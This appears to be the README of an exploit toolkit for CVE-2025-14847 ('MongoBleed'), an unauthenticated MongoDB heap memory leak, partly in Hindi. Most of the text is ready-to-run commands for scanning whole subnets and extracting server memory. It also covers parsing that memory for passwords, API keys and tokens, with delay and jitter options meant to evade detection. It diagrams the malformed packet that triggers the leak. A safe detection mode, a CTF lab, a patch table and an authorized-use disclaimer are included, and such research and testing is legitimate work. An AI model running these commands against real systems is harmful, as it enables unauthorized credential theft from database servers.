
CVE-2025-14847 (MongoBleed) स्कैनर और एक्सप्लॉइट टूल। zlib डीकंप्रेशन के माध्यम से अनप्रमाणित MongoDB हीप मेमोरी लीक। डिटेक्शन, मेमोरी निष्कर्षण, क्रेडेंशियल पार्सिंग, CIDR/बैच स्कैनिंग, Nuclei टेम्पलेट और CTF लैब शामिल।
CVE-2025-14847 स्कैनर और एक्सप्लॉइटेशन टूलकिट
MongoBleed के लिए एक सुरक्षा अनुसंधान टूलकिट -- MongoDB के zlib डीकंप्रेसन में एक गंभीर बिना प्रमाणीकरण वाला मेमोरी लीक, जो हमलावरों को बिना प्रमाणीकरण के सर्वर हीप मेमोरी से संवेदनशील डेटा निकालने की अनुमति देता है।
╔╦╗┌─┐┌┐┌┌─┐┌─┐╔╗ ┬ ┌─┐┌─┐┌┬┐
║║║│ │││││ ┬│ │╠╩╗│ ├┤ ├┤ ││
╩ ╩└─┘┘└┘└─┘└─┘╚═╝┴─┘└─┘└─┘─┴┘
CVE-2025-14847 Scanner & Exploit
# No external dependencies -- Python 3 standard library only
cd cli
# Detect if a target is vulnerable (default action)
python mongobleed.py -t localhost:27017
# Scan an entire subnet
python mongobleed.py -t 192.168.1.0/24
# Extract memory and parse for credentials
python mongobleed.py -t target:27017 -e --credentials
# Safe mode -- detection only, no exploitation
python mongobleed.py -t target:27017 -s
MongoBleed/
├── cli/ # Command-line scanner and exploitation tool
│ ├── mongobleed.py # Main CLI tool
│ ├── requirements.txt # Python dependencies (stdlib only)
│ └── README.md # CLI documentation
├── lab/ # Docker-based CTF lab environment
│ ├── docker-compose.yml # Multi-container lab setup
│ ├── vulnerable/ # Vulnerable MongoDB configurations
│ ├── patched/ # Patched MongoDB for comparison
│ ├── no-zlib/ # Non-exploitable (zlib disabled)
│ ├── monitoring/ # Attack visualization dashboard
│ ├── warmup-heap.sh # Populate heap with sensitive data
│ └── README.md # Lab setup instructions
├── nuclei/ # Nuclei scanning templates
│ ├── CVE-2025-14847.yaml # Active exploitation template
│ ├── CVE-2025-14847-safe.yaml # Safe detection template
│ └── README.md # Nuclei template docs
├── docs/ # Educational documentation
│ ├── README.md # Learning path index
│ ├── 01-fundamentals.md # MongoDB & memory basics
│ ├── 02-vulnerability.md # CVE-2025-14847 deep dive
│ ├── 03-exploitation.md # Hands-on exploitation
│ ├── 04-detection.md # Hunting and detection
│ └── 05-defense.md # Mitigation strategies
└── README.md # This file
192.168.1.0/24, 10.0.0.0/16:27018)# Check single target
python mongobleed.py -t localhost:27017
# Check with verbose output
python mongobleed.py -t localhost:27017 -v
# Safe mode -- detection only, never sends exploit payload
python mongobleed.py -t localhost:27017 -s
# Show version info
python mongobleed.py -t localhost:27017 --version
# Scan a /24 subnet
python mongobleed.py -t 192.168.1.0/24
# CIDR with custom port
python mongobleed.py -t 10.0.0.0/24:27018
# Scan from target file (CIDR ranges in file are expanded)
python mongobleed.py -T targets.txt -j 20 -o results.json
# Target file can contain IPs, host:port, and CIDR ranges
cat targets.txt
# 192.168.1.100:27017
# 10.0.0.0/24
# mongodb.internal:27017
# Extract memory (default offset range 20-8192)
python mongobleed.py -t target:27017 -e
# Custom offset range
python mongobleed.py -t target:27017 -e --min-offset 20 --max-offset 500
# Continuous extraction (Ctrl+C to stop)
python mongobleed.py -t target:27017 --continuous
# Force extraction even if version check is inconclusive
python mongobleed.py -t target:27017 -e --force
# Parse leaked memory for credentials and secrets
python mongobleed.py -t target:27017 -e --credentials
# Parse for tokens specifically
python mongobleed.py -t target:27017 -e --tokens
# Extract printable strings
python mongobleed.py -t target:27017 -e --strings
# Hexdump output
python mongobleed.py -t target:27017 -e --hexdump
# Add delay between requests (milliseconds)
python mongobleed.py -t target:27017 -e --delay 500
# Random jitter on delay
python mongobleed.py -t target:27017 -e --delay 1000 --jitter
# Safe detection only
nuclei -t nuclei/CVE-2025-14847-safe.yaml -u mongodb://localhost:27017
# Active detection
nuclei -t nuclei/CVE-2025-14847.yaml -u mongodb://localhost:27017
# Scan multiple targets
nuclei -t nuclei/ -l targets.txt
# Start all containers
cd lab && docker compose up -d
# Services:
# - localhost:27017 MongoDB 4.4.29 (Vulnerable + zlib)
# - localhost:27018 MongoDB 6.0.26 (Vulnerable + zlib)
# - localhost:27019 MongoDB 8.0.16 (Vulnerable + zlib)
# - localhost:27020 MongoDB 8.0.17 (Patched)
# - localhost:27021 MongoDB 8.0.16 (No zlib - not exploitable)
# - localhost:8080 Monitoring Dashboard
# Warm up heap with sensitive data before exploitation
./warmup-heap.sh 27017 50
# Run exploit against lab
cd ../cli
python mongobleed.py -t localhost:27017 -e --credentials
Target:
-t, --target TARGET Target host:port or CIDR range (e.g. 192.168.1.0/24)
-T, --targets FILE File with target list (supports CIDR per line)
Detection:
--detect Detect if target is vulnerable (default action)
--version Show MongoDB version
-s, --safe Safe mode - detection only, no exploitation
Exploitation:
-e, --extract Extract memory via offset scanning
--min-offset N Minimum offset to probe (default: 20)
--max-offset N Maximum offset to probe (default: 8192)
--continuous Continuous extraction mode
--force Force extraction even if version check fails
Analysis:
--credentials Parse for credentials
--tokens Parse for tokens
--strings Extract printable strings
--hexdump Display hexdump
Evasion:
--delay MS Delay between requests (milliseconds)
--jitter Random delay jitter
Output:
-o, --output FILE Output file (JSON)
-v, --verbose Verbose output
-q, --quiet Quiet mode
--json JSON output
--no-color Disable colors
Connection:
--timeout SECS Connection timeout (default: 10)
-j, --threads N Threads for batch scanning (default: 10)
यह टूल निकाली गई मेमोरी में निम्नलिखित पैटर्न खोजता है:
MongoBleed, MongoDB के zlib मैसेज डीकंप्रेसन (message_compressor_zlib.cpp) में एक खामी का शोषण करता है। भेद्य कोड वास्तविक डीकंप्रेस्ड लंबाई के बजाय आवंटित बफ़र आकार लौटाता है, जिससे हमलावर अनइनिशियलाइज़्ड हीप मेमोरी पढ़ सकते हैं।
1. CONNECT (no authentication required)
↓
2. SEND MALFORMED OP_COMPRESSED
┌──────────────────────────────────┐
│ originalOpcode: OP_MSG (2013) │
│ uncompressedSize: INFLATED │ ← Bug trigger
│ compressorId: zlib (2) │
│ compressedMessage: [small data] │
└──────────────────────────────────┘
↓
3. SERVER ALLOCATES OVERSIZED BUFFER
[ small real data | uninitialized heap memory ]
↓
4. BSON PARSER READS INTO HEAP GARBAGE
Inflated document length causes parser to read
beyond actual data into heap memory
↓
5. ERROR RESPONSE LEAKS MEMORY
"invalid BSON field name 'password=secret123...'"
यह टूलकिट केवल अधिकृत सुरक्षा परीक्षण, अनुसंधान और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। केवल उन प्रणालियों के विरुद्ध उपयोग करें जिनके स्वामी आप हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है।
MIT License
| प्रकार | उदाहरण पैटर्न |
|---|
| password | password: value, passwd=value |
| secret | secret: value |
| api_key | api_key: sk_live_... |
| token | token: ... (16+ वर्ण) |
| bearer_token | Bearer eyJ... |
| jwt | eyJ... (Base64 JWT) |
| mongodb_uri | mongodb://user:pass@host |
| postgres_uri | postgresql://... |
| redis_uri | redis://... |
| stripe_key | sk_live_... |
| openai_key | sk-... (48+ वर्ण) |
| aws_access_key | AKIA... |
| github_token | ghp_... |
| slack_token | xoxb-..., xoxp-... |
| ctf_flag | FLAG{...} |
| आइटम | मान |
|---|
| CVE | CVE-2025-14847 |
| नाम | MongoBleed |
| CWE | CWE-130 (लंबाई पैरामीटर का अनुचित प्रबंधन) |
| CVSS | 8.7 (उच्च) |
| प्रकार | बिना प्रमाणीकरण वाला मेमोरी लीक |
| खुलासा | 19 दिसंबर, 2025 |
| ITW में शोषण | 29 दिसंबर, 2025 |
| शाखा | भेद्य | पैच किया गया |
|---|
| 8.2.x | 8.2.0 - 8.2.2 | 8.2.3 |
| 8.0.x | 8.0.0 - 8.0.16 | 8.0.17 |
| 7.0.x | 7.0.0 - 7.0.27 | 7.0.28 |
| 6.0.x | 6.0.0 - 6.0.26 | 6.0.27 |
| 5.0.x | 5.0.0 - 5.0.31 | 5.0.32 |
| 4.4.x | 4.4.0 - 4.4.29 | 4.4.30 |
| 4.2.x | सभी वर्ज़न | EOL - कोई पैच नहीं |
| 4.0.x | सभी वर्ज़न | EOL - कोई पैच नहीं |
| 3.6.x | सभी वर्ज़न | EOL - कोई पैच नहीं |